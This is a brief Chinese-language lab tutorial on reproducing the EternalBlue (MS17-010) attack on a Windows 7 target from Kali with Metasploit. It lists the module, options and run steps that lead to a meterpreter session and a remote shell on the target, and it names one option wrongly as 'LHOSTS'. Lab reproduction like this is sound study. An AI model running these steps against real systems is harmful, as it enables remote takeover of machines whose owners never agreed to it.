永恒之蓝漏洞利用复现
准备阶段:
1.系统:kali,win7
2.使用工具:metasploit,msfconsole
3.知道攻击机(一般是kali)和目标机(win7)的ip地址
操作:
1.打开kali终端,切换到root权限
2.初始化metasploit,输入 msfdb init
3.启动msfconsole
msf使用法则:
使用模块 -> 配置模块必选项 -> 运行模块
metasploit攻击永恒之蓝全流程:
开始之前一般会先ping一下目标机,如果连不上请把目标机的防火墙关了。
1.查找永恒之蓝模块 search ms17_010
2.使用模块 use exploit/windows/smb/ms17_010_eternalblue
3.查看必选项 show options
4.设置必选项 set RHOSTS 目标机ip
set LHOSTS 攻击机ip
5.run
完成攻击后,会进入meterpreter命令行,输入shell,就进入了目标机的命令界面,可以想干嘛就干嘛了。